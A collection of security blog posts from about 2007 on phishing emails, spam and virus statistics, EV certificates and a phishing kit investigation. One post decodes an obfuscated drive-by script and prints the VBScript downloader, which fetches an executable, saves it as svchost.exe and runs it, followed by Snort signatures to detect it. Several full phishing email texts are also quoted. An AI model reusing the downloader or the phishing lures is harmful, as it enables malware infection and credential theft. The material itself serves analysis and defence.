The phishing email below, is not the usual text of “a security upgrade has been preformed and you need to confirm your account details” or asking you to login, this is coming from a different angle that initially you would not think that it is phishing for your details. This is inquiring if you might require a loan, and the email provides plenty of relevant information with regard to this Small Firm Loan.

It is not until to click on the link to find out more information, that it redirects you to site in France that requires you to log in with your account details.


Lloyds TSB online for business - Online Notification of New Legal Notices

Lloyds TSB Bank plc and Lloyds TSB Scotland plc are authorised and regulated
by the Financial Services Authority and signatories to the Banking Codes.
FSA authorisation can be checked on the FSA’s Register at:
[5]www.fsa.gov.uk/register. Lloyds TSB Bank plc and Lloyds TSB Scotland plc
are members of the Financial Services Compensation Scheme and the Financial
Ombudsman Service. Lloyds TSB Group plc.


As customers may be in state of panic regarding their funds they may be prepared to do things they might not do otherwise to ensure their money is secure.

Over the last two weeks we have seen phishing emails playing on this fear by including statements “to assure you that your accounts and your assets are safe with us” and making all efforts to comply with the “requirements of the United Kingdom Financial Services Authority (FSA) “.

As of yet, we have not seen any phishing emails supposedly originating from Northern Rock, this email purports to be from HSBC Bank.

See below for the text of the phishing email.

Every week, we see the quality of the phishing email text and grammar improving, making phishing emails more believable
The email itself, is extremely well written and does not contain the usual spelling mistakes, making it harder for the readers to distinguish what is real and what is not.


AN IMPORTANT MESSAGE TO HSBC CUSTOMERS
Dear HSBC Bank Plc customer
I want to assure you that your accounts and your assets are safe with us,
and that we put the utmost value on our relationship with you.
As part of our efforts to meet the requirements of the United Kingdom
Financial Services Authority (FSA), we now ask all HSBC users to verify
their account information. It's a smart and simple way to add an additional
level of protection to your account.
Here's How it works :
* [1]Click here to securely log on.
* Complete our quick and simple form.
* Continue with your account session.

Issued for UK use only | © HSBC Bank plc 2002-2007


1. Ignoring the human element of security

Under-investing in staff skills also causes problems. You may well have invested in the latest, state-of-the art, security technology. But if the people operating it don’t understand it, or the principles behind its use, then mistakes will be made, alerts will be missed and incidents will occur.

2. Viewing security as an add-on

When a system becomes relied on by the business for day to day work, it is too late to realise that it is impossible to secure adequately when that inevitable incident occurs. If security is designed in from the start, these problems can be avoided.

3. Temporary changes that turn out to be permanent

Under pressure to solve a problem, or just needing a quick fix to an issue: “It’s only for a short while, it won’t do any harm to relax the security”. Then the change goes in. And stays in.

4. Relying upon security products or following the latest vendor-led trends.

You need a security solution that fits your business needs and objectives. Trying to fit your requirements to the latest fashionable techniques and solutions doesn’t work.

5. Assuming that trusted partners aren’t a threat

Your network might be nicely secure from the outside. But a “guest”; be it a contractor, auditor or even a support company with a connection to your network, could simply bypasses your security processes and procedures – resulting in an incident.

6. Over reacting to an incident

An incident can turn into a disaster – if the reaction is unplanned and extreme. Shutting down the network instead of containing the problem, or wiping a server to remove a problem can sometimes cause more damage than the incident itself.

7. Not testing your changes

With security systems you have to both test that the change you make both allows the access you need, and still denies the access you don’t want. Often the latter is overlooked. Don’t forget to test something still doesn’t work, alongside the something which now does work.

8. Thinking hackers don’t exploit test systems

You know it is only a test system – so doesn’t need to be set up like the real one. But the hacker doesn’t. Placing test systems on live networks is a great way of opening up holes, which can be quickly found and exploited.

9. Believing security is only about confidentiality

Loss of systems or access to systems, or data being changed without your knowing, will be as damaging as a leak of information. Remember Confidentiality, Integrity and Availability.

Backups are only good if you can use them. Recovery from backup media has to be tested on a regular basis.
And always remember to test recovery with the kinds of systems you will be using in a disaster recovery situation.

There is no technical difference between the an EV certificate and a ‘normal’ x509/SSL certificate; they’re just meant to be more difficult to obtain from a Certificate Authority (CA).

Does this not defeat the object of what SSL certificates were originally intended to be. Were SSL certificates not meant to be difficult to obtain, and require validation in the first place? All this now says to users’ is that ‘normal’ SSL certificates cannot be trusted; and organisations now have to purchase one of these ‘extra-secure’ certificates.
As if educating users’ to trust the ‘lock icon in the status bar’ wasn’t difficult enough, they now have to be trained to tell the difference between two valid certificates.

And just to end on a joke. The site setup by Microsoft to demonstrate the security of EV Certificates has…

…an expired certificate.

As explained in the ISC blogs, some javascript code is loaded from a hacked webpage which opens another payload through an Iframe. This payload has been encoded in order to evade web protections software using an “US-ASCII Exploit“. The tools, written in June 2006, add the hexadecimal value “0×80″ to each letter. The following script will help to decode the payload:


curl -s http://www.example.com/payload.htm | \
sed '/< .*>/d’ | \
hexdump | \
sed ’s/^.\{7\}//;s/ //g;’ | \
tr ‘\n’ ‘ ‘| sed ’s/ //g’ | \
perl -pe ’s/([0-9A-Z]{2})([0-9A-Z]{2})/$a=chr(hex($2)-hex(80));$a.=chr(hex($1)-hex(80));/ieg;’

The output of this command is:

<html>
<script language=”VBScript”>
on error resume next
OOOOOOOOOOOOOwwwwwww = “http://www.example.com/acp/www.exe”
Set eeeeeeeeeeeennnnnnnnnnn = document.createElement(”obj”&”ect”)
eeeeeeeeeeeennnnnnnnnnn.setAttribute “classid”, “clsid:BD96C55″&”6-65A3-11D0-983″&”A-00C04FC”&”29E36″
str=”Micro”&”soft”&”.XMLH”&”TTP”
Set x = eeeeeeeeeeeennnnnnnnnnn.CreateObject(str,”")
set S = eeeeeeeeeeeennnnnnnnnnn.createobject(”Ad”&”odb.S”&”tr”&”eam”,”")
S.type = 1
x.Open “GET”, OOOOOOOOOOOOOwwwwwww, False
x.Send
set F = eeeeeeeeeeeennnnnnnnnnn.createobject(”Scrip”&”ting.F”&”ileS”&”ystemObject”,”")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,”svchost.exe”)
S.open
S.write x.responseBody
S.savetofile fname1,2
set Q = eeeeeeeeeeeennnnnnnnnnn.createobject(”Shell.App”&”licat”&”ion”,”")
Q.ShellExecute fname1,”",”",”o”&”pe”&”n”,0
S.close
</script>
Wide character in print at -e line 1, <> line 1.
</html>

Once the payload is downloaded, it will be copied to a temporary directory as “svchost.exe” and then executed.
When this finished, I began to analyse the payload:

lynx http://www.example.com/acp/www.exe --mime_header

HTTP/1.0 502 Bad Gateway
Server: Microsoft-IIS/5.0
Date: Tue, 06 Feb 2007 10:53:58 GMT
Content-Length: 215
Content-Type: text/html
Age: 249

<head><title>Error in CGI Application</title></head>
<body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:<p></p><p><pre><

Any idea of what’s happening here?

Instead of downloading “www.exe” file, the server has been configured to execute the payload as a server side script (CGI). The script will be run as many times as people browse pages containing this payload. The file can not therefore be downloaded and copied … How sad !
Thus said it is also telling us that the bad guy didn’t test his payload, or that this payload was automatically installed.

Once finishing the analysis of the payload investigation, I’ve created some snort signatures to detect it:


# bc d3 c3 d2 c9 d0 d4 <SCRIPT
# bc f3 e3 f2 e9 f0 f4 <script
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated script"; flow:established,from_server; \
pcre:"/\xbc[\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/"; pcre:"/US-ASCII/i"; \
reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; \
reference:cve,2006-3227; reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; \
classtype:web-application-attack;sid:200702061;rev:1;)



# ae ef f0 e5 ee a0 a2 e7 e5 f4 a2 .open "get"
# ae cf d0 c5 ce a0 a2 c7 c5 d4 a2 .OPEN "GET"
ALERT tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript download file"; flow:established,from_server; \
pcre:"/\xae[\xef\xcf][\xf0\xd0][\xe5\xc5][\xee\xce]\xa0\xa2[\xe7\xc7][\xe5\xc5][\xf4\xd4]\xa2/"; pcre:"/US-ASCII/i"; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \
reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702062;rev:1;)



# f3 e8 e5 ec ec e5 f8 e5 e3 f5 f4 e5 shellexecute
# d3 c8 c5 cc cc c5 d8 c5 c3 d5 d4 c5
ALERT tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript execute command"; flow:established,from_server; \
pcre:"/[\xf3\xd3][\xe8\xc8][\xe5\xc5][\xec\xcc][\xec\xcc][\xe5\xc5][\xf8\xd8][\xe5\xc5][\xe3\xc3][\xf5\xd5][\xf4\xd4][\xe5\xc5]/"; \
pcre:"/US-ASCII/i"; reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \
reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702063;rev:1;)



# f6 e2 f3 e3 f2 e9 f0 f4
# d6 c2 d3 c3 d2 c9 d0 d4 VBSCRIPT
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (\
msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript"; flow:established,from_server; \
pcre:"/[\xf6\xd6][\xe2\xc2][\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/"; pcre:"/US-ASCII/i"; \
reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \
reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702064;rev:1;)


Phishing has increased and the number of viruses has doubled!! This is the highest percentage of viruses we have seen since last April. Spam has decreased - well originating from China that is, which is not due to less spammers…………

Below, we have the daily breakdown for ham, spam, viruses and phishing.

World of Spam

The volume per geographical location for spam, viruses and phishing emails for January can be seen below.

The spams statistics this month are down for the Asian countries, China especially. Usually China is in the top 3 but this month it has not made it into the top ten. An article in the Register explains why..

An earthquake, which occurred at the end of December, caused severe disruption to internet and telephone networks in Taiwan, Hong Kong, China, South Korea, and Japan, thus suspending spammers from sending spam this month, watch out next month!

Viruses: New Year -> new viruses

The family of Somefool has been knocked from its pedestal, and it barely in the top ten this month. Last month it was robbed of first place and with viruses stats doubling, the family Trojan-Downloader has taken control of the leader board.

The number one this month, Trojan.Downloader-648, is also known as Email-Worm.Win32.Zhelatin.a. This virus is sent as an email attachment. The attachment is a Windows PE EXE file and if it finds files with an .exe or a .scr extension on a victims machine, the virus copies itself to the directory where the file is located under a random name.

Position	Virus	Percentage
	Trojan.Downloader-648		23.55%
	Trojan.Downloader-656		14.06%
	Trojan.Downloader-747		11.48%
	Trojan.Downloader-753		10.68%
	Trojan.Downloader-758		8.02%
	Trojan.Downloader-647		7.52%
	Trojan.Downloader-659		6.97%
	Trojan.Downloader-749		6.15%
	Worm.SomeFool.Gen-2		5.82%
	Trojan.Downloader.TaberMartyn-112		5.75%

Phishing:

This month has seen major compromised accounts: approximately 60,000 usernames and passwords were obtained from MySpace users .Like Ebay phishing scam, it is rare to actually see how many users submit their details to a phishing scam and how successful phishing sites are.

Many organisations such as PayPal and eBay are adopting the extended validation ssl certificates, in a measure to counteract users thinking that phishing sites are the real site. Once the user clicks on the cert, the address bar will turn green and A special label will appear giving information regarding the website owner. In a study conducted, it showed that this EV ssl certificates made little or no difference to help users in distinguishing real sites from fraudulent ones.

Yesterday we received yet another email purporting to be from Barclays bank, requiring the customer to update their personal information, due to an error in upgrading the security software.

The interesting part of this email was the level of processing required by the phisherman - in the header of the email, the the recipient’s email address was to ‘firstname’@xxx, which is the usual. But in the main body of the email, the display name was ‘Dear firstname lastname’. In most phishing emails received, a salutaion does appear at the beginning of the mail, and if one is present it is the firstname or username of the recipient.

The little extras put in by the phisherman, constantly improves the ‘reality’ of the mail.

The overall statisitics for viruses and phishing have not fluctuated much from last month. Spam is down slightly.

Below, we have the daily breakdown for ham, spam, viruses and phishing.

We can certainly see the decline in the emails over the Christmas time - spammers especially.

World of Spam

The volume per geographical location for spam, viruses and phishing emails for December can be seen below.

Viruses: it Christmas time and time for a Trojan …

A new number one for Christmas!! Trojan.Downloader-390 also known as Luder.A (F-secure) - this is an e-mail worm, a dropper for a trojan downloader and a file infector. This virus sends itself as an attachment usually called ‘postcard.exe’, with the ‘Happy New Year! in the subject line.

Position		Virus	Percentage
1		Trojan.Downloader-390		54.11%
2		Worm.SomeFool.Gen-2		24.70%
3		Trojan.Downloader-388		7.86%
4		Worm.SomeFool.P		4.16%
5		Worm.Mytob.CL		1.82%
6		Exploit.HTML.IFrame		1.66%
7		Worm.Stration.WZ		1.55%
8		Worm.SomeFool.Gen-1		1.46%
9		Worm.Mytob.BM-2		1.31%
10		Worm.Stration.XH-1		1.26%

Phishing:

Barclays has kept the top place for December, but Fifth Third Bank is a close second.

Spam has gone up by ~4% while phishing is gone down since last month.

Below, we have the daily breakdown for ham, spam, viruses and phishing.

World of Spam

The volume per geographical location for spam, viruses and phishing emails for November can be seen below.

Viruses:

Again this month, the stration family is in the lime light. It has moved up to second place, will it knock Somefool out of first place next month.

Position		Virus	Percentage
1		Worm.SomeFool.Gen-2		38.96%
2		Worm.Stration.YY		15.12%
3		Worm.Stration.MN		9.66%
4		Worm.SomeFool.Gen-1		8.63%
5		Worm.SomeFool.P		8.29%
6		Worm.Stration.NS		5.56%
7		Wormery.Mail.Update_KB_x86_zip1		3.94%
8		Worm.Stration.NP		3.51%
9		Worm.SomeFool.Z		3.48%
10		Worm.Bagle.pwd-eml		2.86%

Phishing:

Phishing in the last 3 months has seen Barclays as number one, can it last till Christmas.

In this article we investigate, in detail, a phishing scam, and provide insight into how effective they are, and who the likely victims will be.

The phishing scam process:
- looking/scan for a vulnerable website
- inject a phishing kit using the website vulnerability
- email the user and convince them to go on the fake website
- wait for the user to enter their credentials
- collect/resell/user the informations collected.

This week we received yet another email purporting to be from ebay where it contained a link to a phishing site. This german phishing site is no different from any other, but this time the information collected from users that submitted their details were contained in a file on the phishing website. It is very rare to be able to view the results of a phishing scam, and to view the number of users that have entered their credentials. Phishing kits usually send emails to an anonymous account containing user data, so that the information collected is not stored on the server. This time the collection process was slighty different, the information was also written to a file on the web server.

Over the last week we have being keeping tabs on this phishing site and the files containing user information. On Thursday when we first viewed this site, this phishing scam had captured 1024 user’s credentials. Within two hours there was an increase in users’ details by 1%, or ten users. On this site, files were found containing user confidential information, one file contained eBay login details (username and password) and the second file contained credit card/banking account details, and also users’ addresses, phone numbers and dates of birth - as well as other items relating to the users’ identity!!!

The phisherman who sent out these phishing emails has been around since April 2006; an article appeared in Castlecops where phishing emails were not just targeting eBay, but Chase, HSBC, and Paypal. We alerted the owners of the website to inform them of the phishing scam on their site. However, a week later the site is still up, and still gathering user information. Approximately 150 more users details have being collected, bringing the total to 1190. The file that contained the credit cards details has a total of five users.

The graph below illustrates, the increase in users details against time.

The next thing we knew was that loads of spam started arriving.

What is this Dark Spam?

As well as performing dictionary attacks on the left hand side (mailbox)
part of analysis address - sales@, billing@, info@, john@, the
spammers are doing similar tricks with the righthand side - in the hope of
finding a valid domain - the obvious one is “www”, but if you’ve ever had
urls published, scrapable from the web, then you’ll be getting spam to
these. This includes names such as lists.example.com, cvs.example.com
and so on. In fact, you don’t even need an MX record - just an A record
and and an smtp service to recieve it will do.

We’ve labelled this phenonemon “Dark Spam”. Spam that is out
there, just waiting to spring into visibilty.

Another, more obvious, source of dark spam are dormant domain names.
We once re-established a long expired domain name and found that
even after a number of years of non-existence, it was getting more spam
than ever.

However, it is the idea of speculative domain name creation by the
spammers - so that spam is already to arrive as soon as a DNS record
and SMTP server is set up that really defines the phenonemon that is Dark Spam.